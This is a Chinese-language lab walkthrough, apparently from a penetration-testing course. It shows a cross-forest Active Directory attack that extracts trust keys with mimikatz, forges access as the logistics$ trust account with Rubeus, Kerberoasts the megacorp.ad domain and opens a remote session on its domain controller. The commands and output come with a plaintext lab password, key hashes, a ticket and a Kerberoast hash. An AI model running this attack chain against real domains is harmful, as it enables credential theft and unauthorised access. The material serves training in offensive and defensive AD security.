跨林攻击-信任账户
1. 实验环境
| VM | IP |
|---|---|
| SQL01 (SQL01.inlanefreight.ad) | 10.129.5.253 (DHCP) / 172.16.118.10 (dual interface) |
| DC01 (DC01.inlanefreight.ad) | 172.16.118.3 |
| WS01 (WS01.child.inlanefreight.ad) | 172.16.118.20 |
| DC02 (DC02.logistics.ad) | 172.16.118.252 |
| SQL02 (SQL02.logistics.ad) | 172.16.118.11 |
| DC03 (DC03.megacorp.ad) | 172.16.118.113 |
DC01是inlanefreight.ad域内域控DC02是logistics.ad域内的域控DC03是megacorp.ad域内的域控制。
2. 信任账户
当从 Forest-A 域到 Forest-B 域建立单向出站信任关系时,会在 Forest-B 域中创建一个名为 A$ 的信任帐户。可以使用管理权限和 mimikatz 等工具,从任一域的DC中获取到A$的明文凭据和 kerberos 密钥。作为信任关系的一部分而创建的信任帐户 (A$) 将拥有 Forest-B 域中普通域用户的权限。
假设我们有两个域, 其中 logistics.ad 域与 megacorp.ad 域之间存在单向出站信任关系。因此Megacorp域的管理员可以访问 Logistics 域中的资源,但反之这不行
但在 Megacorp.ad 域中也创建了一个 megacorp\logistics$ 信任账户,其主组设置为 Domain Users。Logistics域的管理员可以利用 mimikatz 等工具,提取出该信任账户的明文凭据
- 信任账户只存在于被信任域(单向信任中)
- 信任对象两个域都有,可以获取到存储的密钥
- 双向信任中就存在一个信任账户
3. 利用信任账户进行跨林攻击
3.1. 登录Logistics域
┌──(root㉿kali)-[~/Desktop/htb/Academy/Trust]
└─# proxychains -q evil-winrm -i 172.16.118.252 -u Administrator -p 'L0gistics_adm!'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
3.2. 枚举信任信息
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ADTrust -Identity megacorp.ad
Direction : OutboundDisallowTransivity : False
DistinguishedName : CN=MEGACORP.AD,CN=System,DC=logistics,DC=ad
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : MEGACORP.AD
ObjectClass : trustedDomain
ObjectGUID : 90748280-8770-4a93-9dde-b5c18e14125b
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=logistics,DC=adTarget : MEGACORP.ADTGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False
logistics.ad单向信任MEGACORP.AD,所以megacorp.ad可以访问logistics.ad
因为单向出站信任,当前域无法访问megacorp.ad。比如我们尝试查询Megacorp的域名
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami;hostname
logistics\administrator
DC02
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ADUser Administrator -Server megacorp.ad
Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.
At line:1 char:1
+ Get-ADUser Administrator -Server megacorp.ad
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (Administrator:ADUser) [Get-ADUser], ADServerDownException
+ FullyQualifiedErrorId : ActiveDirectoryServer:0,Microsoft.ActiveDirectory.Management.Commands.GetADUser
3.3. 获取信任密钥
因为logistics.ad单向信任MEGACORP.AD,所以MEGACORP.AD 上会有一个信任账户logistics$,我们可以使用mimikatz从双方域中获取到与此账号关联的明文密码
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\mimikatz.exe "lsadump::trust /patch" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::trust /patch
Current domain: LOGISTICS.AD (LOGISTICS / S-1-5-21-186204973-2882451676-2899969076)
Domain: INLANEFREIGHT.AD (INLANEFREIGHT / S-1-5-21-2432454459-173448545-3375717855)
[ In ] LOGISTICS.AD -> INLANEFREIGHT.AD
* 3/8/2026 9:57:27 PM - CLEAR - b2 02 bb be 29 d3 36 80 c6 70 fb 00 11 ad cb aa 8d 63 ec 5e c7 3d 3c 6e 3f 3b b5 74 df 51 0c a6 c3 6a bc 35 ee 01 02 15 6c 4b 0c bd 2c e9 2b ed e5 68 f1 9a 68 49 3e be e9 ce 2c af 0a ec df 48 f2 4a 63 fb c0 f2 49 2a c3 ad f0 9f a3 8d f6 fd ea 9b 8d 49 5b 6f bf 4c ae 59 c5 98 05 ee b9 6f b1 53 60 d6 08 5b cb b2 48 6f 6b d9 5f d0 b3 5b c3 34 a2 dc 2f e1 6c e8 a4 75 2c 19 fd 14 b2 4a 3b 4a bb b6 7a b8 6d 0f a0 17 b1 9e 45 1e 5f ec 1f de 95 98 e4 2b e4 27 1b 5f 01 47 91 09 36 9a db 84 44 90 0b ab 40 de a6 a7 40 43 66 29 92 b6 c6 70 46 80 94 e7 bc 17 b1 e3 15 31 b7 4f 72 ee 78 02 d1 c0 a2 12 34 a4 4f 2c fb 2d 46 1b 20 5f 9c c5 7b 26 c6 ac 35 75 10 4e 39 c2 95 42 c6 19 a1 32 f6 f7 e4 0f 7a 1c de 7f 31 be cb 91 19 3f
* aes256_hmac d7de634aca2357f244350515f35aba3e4aa52c6ddd00d474c3594eff06bca11a
* aes128_hmac 2bc900dd8447912056fa42d4471b3c6b
* rc4_hmac_nt 396cd83211022f3924fc63c51a1d5e01
[ Out ] INLANEFREIGHT.AD -> LOGISTICS.AD
* 3/8/2026 9:57:52 PM - CLEAR - 50 cd d7 65 02 14 32 37 a2 2c 21 95 37 04 26 c8 a6 3d 2b b0 ce 5d 40 74 e3 92 35 c9 a3 63 47 05 eb f5 64 80 7f 6e 42 e7 91 dd 57 f6 3d 48 f5 a9 58 62 89 4a 9c 9a 32 45 cd 5d ca 73 10 6a ea 45 78 15 3e 25 e3 d1 73 89 68 03 4c b8 5b 2b ec 96 96 08 5e 98 81 da 8d 68 36 38 15 03 77 e1 45 02 dc 5d 0e 4e bd 83 6c 72 f2 eb 82 dd d4 8b 32 44 09 28 85 d9 5b d4 f3 62 e0 04 da 2e be ad d1 14 75 81 5c f3 87 b9 21 b8 43 5a eb a7 e4 74 f3 b3 b2 04 85 37 bd 54 a5 d6 73 0a e5 cb 11 c8 06 0f 2d a5 0b 91 81 60 dd 80 a7 fb 86 f5 be b2 5a 27 cc 8f 6c fe 74 cc 2e 18 12 5e f9 b9 58 7b 19 25 12 9d 99 77 ff 27 3c d2 b7 5c a2 3c 59 db 57 d7 f8 7c 83 4e bc cb 95 a9 9c b9 f4 e0 b6 ca cc 17 04 28 ec c0 78 e4 10 a2 85 2a 86 de 16 ae 14 bf
* aes256_hmac a8ad4c4b04cb2f4e250ffa4383d6e7884f51a33546e070fc9848268795d5f593
* aes128_hmac 17918ada093fcd2a09008d320b92a0fe
* rc4_hmac_nt f2b684243f0ccb483b024de875278005
[ In-1] LOGISTICS.AD -> INLANEFREIGHT.AD
* 5/12/2025 4:11:24 AM - CLEAR - 2a 8e cf 78 60 3c 25 a2 3a d0 cf d1 7d ec 66 5c 1a 82 84 ac 34 91 24 78 39 cc 2f 09 dc 2a da 6c 72 a0 60 17 8b d9 be 13 68 64 f4 84 7a 66 14 9d b7 98 c2 e3 a1 e7 09 1d 4b 71 60 f0 e1 5a 45 7f 69 5e 97 bf cb c7 88 ab ba 2f 4f 2e 7e 8d 8e 10 6e b0 34 ed 91 c6 0e db fd df be 61 e2 1a 09 60 9d 0f 2f 6d c5 7a 86 78 1b 27 dd 3b 22 5f 34 02 69 37 7e 0f 68 b3 10 ef d2 3f d8 ab e7 5b f1 b6 0e 1f 84 63 3d 8d 82 99 ee 5b 67 3a fc ec a3 b2 fc 5b 43 e9 37 6b c7 6f 90 71 1d 91 24 1e 22 6c 6a 27 a4 27 f9 64 73 7b 84 1a 00 21 82 ca 21 f9 05 4e 15 38 4e 74 e0 80 bd b3 01 66 1c 09 84 68 bc d0 cd 73 28 53 e6 85 a7 41 e0 5f d2 c4 a3 e4 25 06 6b 05 c7 80 c0 86 f6 5c 44 9a 20 c8 c3 96 bb ed 01 71 dc 7f 17 76 a8 c3 f9 af 48 08 63 de
* aes256_hmac 33e7995f339f8b4f045757bb3a8e867d81ddac2d2b8f331e7a00b3f98822f7a0
* aes128_hmac 015f62ba873ecc161edb6309ebe354b1
* rc4_hmac_nt d7c33ad49871cd80807678f2a9c176be
[Out-1] INLANEFREIGHT.AD -> LOGISTICS.AD
* 3/8/2026 9:57:52 PM - CLEAR - da bb 30 c1 ab 00 1d cd c0 4a 12 46 f0 d1 6a 1c 76 fb 7a d1 cd 44 a3 a2 d6 54 d6 04 55 31 54 6b 54 79 3c f3 ca e6 46 e7 ae 55 e7 63 c2 5d eb 4a ce 30 82 6e 8d 15 d3 51 52 a5 cb 13 33 6e 0d 0a d1 d4 d9 20 93 2d f0 cd 5b a7 60 f0 9f 01 d7 e6 65 84 28 08 65 ce fa e0 31 7b b4 46 39 53 83 a6 93 69 59 ac 4b df f7 43 71 2a c8 ae 06 14 19 5d 36 0e 9c d9 db b4 f9 c4 d3 ae fa 52 35 7f 54 29 c9 14 92 cf 93 37 1c 5b 4a d6 27 fd 2e 38 ad d0 38 f1 94 ba 4c 28 39 c8 93 52 4b 67 27 02 61 51 dc b0 55 42 64 ec 11 70 19 c5 05 75 b4 dc ca 40 47 bd 39 c7 12 23 5a a0 d1 e1 a3 41 3d 8f 9f 00 e0 80 89 fb 10 34 f5 05 bb 79 12 72 73 68 ba d1 cb 05 b9 d4 18 7c fa a6 93 72 a0 3c 7a 78 92 0f e1 ee 74 e1 7b 49 27 26 31 8e 70 89 3f 1f 9a 0d
* aes256_hmac 9f34d042435b420ed9ae6084c52c0cf04d942f4cf8f2bede63c78f773a964697
* aes128_hmac 9f04e10d64a3cfdb787af2add4d403d2
* rc4_hmac_nt af6745cb951641ff1bfe7f99f06b72fe
Domain: MEGACORP.AD (MEGACORP / S-1-5-21-983561975-2685977214-3442977283)
[ In ] LOGISTICS.AD -> MEGACORP.AD
[ Out ] MEGACORP.AD -> LOGISTICS.AD * 3/8/2026 9:57:52 PM - CLEAR - bb b6 83 e7 79 ec 85 83 20 f5 52 92 2f ef d4 66 a8 cb 0a 8c b4 90 66 87 1f af 51 a7 99 25 ef 21 f5 d1 0e bb 86 e4 c9 c0 c0 80 31 7e b8 8a 2d e8 f8 fc 1e e1 fc a4 13 2c 0e 49 4e 63 6d ae 96 6e ca f5 3e 45 ff f5 47 7d a0 2b bd ca 3c 13 80 76 b8 2e 73 87 3d 88 23 31 6a bd ac ac 77 a8 a5 c8 ca 03 c7 35 a5 60 82 bb 71 66 1c 2f 8a bf 2e f0 93 a1 62 62 6d 23 4f 5f 2d 69 ec 74 28 49 64 1b 34 50 0b 20 97 f1 74 1e 50 ec 85 f0 ab cc 63 aa db eb 5d 57 10 3b c8 38 8b ee e6 80 49 c6 68 44 5d f9 d5 d1 65 75 4d fa 07 37 8e 4c 19 83 be fc cc 49 85 15 95 32 01 dd a1 41 b3 4d ce 39 0a c2 62 31 68 92 46 46 48 42 a8 38 44 18 e3 84 46 bb 94 2a e8 f1 7f d0 3b 2e 29 38 db 0b a6 c1 f3 c8 82 be fc d1 dc 8e 57 9c 61 33 4c f3 ca d6 50 91
* aes256_hmac 7aee14b61b90a71dbc5a76a1d38261f1e473181168e8eacf828d5f0d3a8b46f4
* aes128_hmac f131a248a997b64eec4b38ff507470d6
* rc4_hmac_nt 2afa9b3d6c6bf2193a8d854aaddd80b5
[ In-1] LOGISTICS.AD -> MEGACORP.AD
[Out-1] MEGACORP.AD -> LOGISTICS.AD * 3/8/2026 9:57:52 PM - CLEAR - 35 b0 fd 69 ae 7e 7e ff 53 c3 ef c6 32 df bf 96 5e b6 18 83 8d 9a 1b ce b0 69 4b 82 fc b0 40 cd 45 ee be 59 f6 f1 c3 70 bb 80 20 8f f0 65 02 cb 79 9c 71 65 05 c5 ae 28 0a 01 34 a9 90 42 0a dc 8d 24 d2 d8 76 60 8b 54 34 80 ea 5c 18 76 97 6c c5 68 b5 34 df ad 14 a1 a0 fa b4 43 f4 ca 48 3a b0 4b 99 22 50 42 27 e0 23 a9 39 bc 5b 30 49 5c 67 0b 29 f9 38 25 86 4c 07 8f 4b f0 44 df 36 1f b7 1c b3 d4 f0 77 8c 7b ef ad cd ec c7 0c 44 ff dd 1a e9 86 d9 bd 13 7d da 25 1e 89 c3 5f 42 ed 38 3f 73 91 67 e7 00 c9 19 f6 8b 73 36 41 0d 91 ee ae aa 67 4e e5 13 8a ce 60 ad 55 27 71 58 ee 35 eb 53 d7 ce 01 f1 35 f9 de c5 4f dd c7 26 05 95 95 e5 5f 8c 57 d0 80 74 86 99 c8 f0 20 24 d9 71 7e 47 be 87 76 38 62 c2 8c 9d e4 a8 86 26 e9
* aes256_hmac f183f794bfac99880891cda37f73975171a9581212bbb20233e91a60f535eddf
* aes128_hmac b5d0216dceadb42b272a447c6951301a
* rc4_hmac_nt 0a1b9d74107cb92796d2520c4611052c
mimikatz(commandline) # exit
Bye!
Out:域信任对象(TDO)的NewPassword属性Out-1:域信任对象的OldPassword属性- 这些属性可以用于申请TGT
在我们的场景中,受信任域对象(TDO) 并不是 logistics$,而是 logistics.ad 域中的一个 trustedDomain 对象类型,具体路径为 CN=megacorp.ad,CN=System,DC=logistics,DC=ad。在 megacorp.ad 域中也存在一个对应的 TDO:CN=logistics.ad,CN=System,DC=megacorp,DC=ad。
双方共享相同的信任密钥。虽然两个域中都存在 TDO,但对于单向信任而言,信任账户 仅在“被信任域”中建立
如果是刚创建的信任关系,双方的信任密钥通常一致,根据 MS-ADTS 6.1.6.9.6.1 节,信任密钥通常每 30 天自动轮换一次。所以当前是不一致的,且具有历史上一次的密钥(二者都是有效的)
这些存储在 TDO 中的信任密钥是由信任账户的密码派生而来的。具体来说,明文形式的NewPassword信任密钥代表了该信任账户的当前密码,而 OldPassword信任密钥通常是之前的旧密码。
由于盐值的不同,双方域内的Kerberos AES密钥会有所区别,但RC4密钥在两边是完全相同的。所以我们可以直接从当前域提取出RC4信任密钥,然后用megacorp.ad\logistics$ 的身份向 megacorp.ad 进行身份验证
3.4. 使用Rubeus获取TGT
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\Rubeus.exe asktgt /user:logistics$ /domain:megacorp.ad /rc4:2afa9b3d6c6bf2193a8d854aaddd80b5 /ptt /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 2afa9b3d6c6bf2193a8d854aaddd80b5
[*] Building AS-REQ (w/ preauth) for: 'megacorp.ad\logistics$'
[*] Using domain controller: 172.16.118.113:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIE8DCCBOygAwIBBaEDAgEWooIEBjCCBAJhggP+MIID+qADAgEFoQ0bC01FR0FDT1JQLkFEoiAwHqADAgECoRcwFRsGa3JidGd0GwttZWdhY29ycC5hZKOCA8AwggO8oAMCARKhAwIBAqKCA64EggOqTcSdU+xYa7XZ/SyhvXmWbZl/rfgfTGe6GddQ3HPCn79GkMTPbvs12rfznGRkIKzUts/1iacYR7hS/fvKiyQKJrzZQYlGK0AwEAlOYyNw/fwzRWx0nxymw0J/PeCLrbx2HtS2EAT0YBL/7LyGiiK8pHKzAyDzHoZOGwC/mkAiGrR6wUqOGUI1+3EOexYNzgcaQfLewbGFmwyatTXoRcY9Ng34P6M727jt2kG2nlsdQi4dgn0dcTGt92aO91FUNOVz+ZFp7SW8buvx4V+rNPgGs/1V3nhp74Rn6hYDSF0jGqHLGn+vwSFVvHmWUnetMx8Dh+dNQGcggnbwCNjD6EZo5wrk4msvC8FTu9JLce+5jYTuJ6aYaPcuu+tk2txJ2qImd+oM+InBS0v2sMp7zqYk9AIwOznYiS73+kLjVLPb/yQen7kn2mSoSnEpuafGzmZJG4qQin7Q26NwIQe2wuPZE17LacJ+D094YUu6NSrWz4p/T4bMwOpaOq7x1uAIgO74pU2hLe61q673qNwwt9QBlvZEWk3fMpT1ruJ7jhyDxKqWRhE1BYHGjlImVqHODjF+pgpMHdV3AetcZeUAD/hTEt4TSZcYrHh2oq+ysLI6EujVJrgFlGFLquN4H9dgJFr7gunyF9Vs53BwhSY4e0QjIco4DjcSXSB8lAOTzXQRWnXm/qLxXEJdq7yzRkQKaj0pj4rbZnBXQNZf1/h6SO0vAPUQVMXOSA9mPtEoSmPzxahrV5zBRBFCGCu1Q7PICru9yxyBXJr8KCGsn6MsYjd2SLKNhEbpioJJLTnpIQEx4oPMi/FopucWUxtmkZKpk6QCHe+bWM7zZB4Vf2fOaUwtwPnwrwm1ZLO4BkBAzPpJgjKSNdJ4rx0dSESt+TIKTHPte/IiYXC/48dyLpwck3STYYWvFuq+L7Ze6vKes+n9kojO+umSHTFN/vgvswy/95M/8xJM9PwYzNt6IipNcqvqc4bpHqWEELERp+8BQ81Y8XdLdIfpXc2Q1G7atPhT5p8Qt+R65ds0UAFbFizd+aCAsA/+bVLp0LH8YW+IBb377VgyPxrS3D/YoBAcSawexSdkjkFc4EbN3r1izfUjtPuP5iHRfpbmHG63M1zx6h84CNoGzVtCfSZgIjM4fUcETU+ED2AJPOYRiWrrdUjfCljatuaCji6cmXtxPoKXPQUYxkK5asE65EEr/COFgTLe9wz5waZPbY6NVG3zcbdA9RgxjRdsk0XaIFdQceGjgdUwgdKgAwIBAKKBygSBx32BxDCBwaCBvjCBuzCBuKAbMBmgAwIBF6ESBBBQ00P7rXbLfl06ztmISaoHoQ0bC01FR0FDT1JQLkFEohcwFaADAgEBoQ4wDBsKbG9naXN0aWNzJKMHAwUAQOEAAKURGA8yMDI2MDMwOTA3NTkxOVqmERgPMjAyNjAzMDkxNzU5MTlapxEYDzIwMjYwMzE2MDc1OTE5WqgNGwtNRUdBQ09SUC5BRKkgMB6gAwIBAqEXMBUbBmtyYnRndBsLbWVnYWNvcnAuYWQ=
[+] Ticket successfully imported!
ServiceName : krbtgt/megacorp.ad
ServiceRealm : MEGACORP.AD
UserName : logistics$ (NT_PRINCIPAL)
UserRealm : MEGACORP.AD
StartTime : 3/9/2026 12:59:19 AM
EndTime : 3/9/2026 10:59:19 AM
RenewTill : 3/16/2026 12:59:19 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : UNND+612y35dOs7ZiEmqBw==
ASREP (key) : 2AFA9B3D6C6BF2193A8D854AADDD80B5
*Evil-WinRM* PS C:\Users\Administrator\Documents> klist
Current LogonId is 0:0x2bf604
Cached Tickets: (1)
#0> Client: logistics$ @ MEGACORP.AD
Server: krbtgt/megacorp.ad @ MEGACORP.AD
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 3/9/2026 1:01:09 (local)
End Time: 3/9/2026 11:01:09 (local)
Renew Time: 3/16/2026 1:01:09 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
然后我们就可以与megacorp.ad进行通讯了
PS C:\Users\Administrator\Documents> Get-ADUser Administrator -Server megacorp.ad
DistinguishedName : CN=Administrator,CN=Users,DC=MEGACORP,DC=AD
Enabled : True
GivenName :
Name : Administrator
ObjectClass : user
ObjectGUID : afcf823b-3376-4f8f-be07-144b3664b4fb
SamAccountName : Administrator
SID : S-1-5-21-983561975-2685977214-3442977283-500
Surname :
UserPrincipalName :
3.5. 对Megacorp进行Kerberoasting
PS C:\Tools> .\Rubeus.exe kerberoast /domain:megacorp.ad
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.3
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : megacorp.ad
[*] Searching path 'LDAP://DC03.MEGACORP.AD/DC=megacorp,DC=ad' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 2
[*] SamAccountName : black.beard
[*] DistinguishedName : CN=black.beard,CN=Users,DC=MEGACORP,DC=AD
[*] ServicePrincipalName : HTTP/WHITE.megacorp.ad:1433
[*] PwdLastSet : 3/9/2024 3:02:40 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash :
$krb5tgs$23$*black.beard$MEGACORP.AD$HTTP/WHITE.megacorp.ad:1433@megacorp.ad*$5E
F3FCC09DDC4221424A15C53192C02A$FB035250A4DB98DFD80EA037242B821A4B24BA8C8D0B014BF
38E074DD0E04259F76B638C47889177B81E1E2B590F054B9A986B8CC62A5B978CE7ADFDD9BCD06BF
F270BAC15AF9C4BD4D4D8DA2C1453926EA056134E0ED925E46B7977B0524F88F9F6CF7C6A12FD15E
41CFDA14A6043D8FBB0BADB0576D42F21C8F1DC175970A3E60E3FA16624B0D76C8B9D1703852D4BD
41C305EC2279B7938CCAB9708EB1E9EC2431B2EABBEFC0BFB687A32B5C1CC4642E5A6B736D73DF4A
45FDAD2DEA42ABAF22D37CFAA3ACC1C981E09E2BE2A886286E9ABC22A6E3A434A5A45BE15FCD626A
6E34304540821D6B95A79E56ABCC2E6678AAB5DB8151F18A2D8C09CF258E7FC97A2624F26E345762
3C0AF9A2F01B4DBFDBFB911993C843FEA38B9379103959AAE3D679BDA71D0F5DC71816168CA31609
0B21B54D66F9F19C3C9EE80A2E630A9D995953A859B815A5106F141B2276BA13AF0964D91A0CB88B
687DF5EAD61504A0F11B1ADD4C55E94245D7901CFC54C8AFE956E87192EE99F4048BF3A4A71D4A70
<SNIP>
.\Rubeus.exe asktgt /user:white.beard /password:<SNIP> /domain:megacorp.ad /ptt
3.6. 使用 PSSession 访问 Megacorp 域
PS C:\Tools> New-PSSession DC03.megacorp.ad
Id Name ComputerName ComputerType State Configuration
Name
-- ---- ------------ ------------ ----- -------------
2 Session2 DC03.megacor... RemoteMachine Opened Microsoft....
PS C:\Tools> Enter-PSSession DC03.megacorp.ad
[DC03.megacorp.ad]: PS C:\Users\white.beard\Documents> whoami
megacorp\white.beard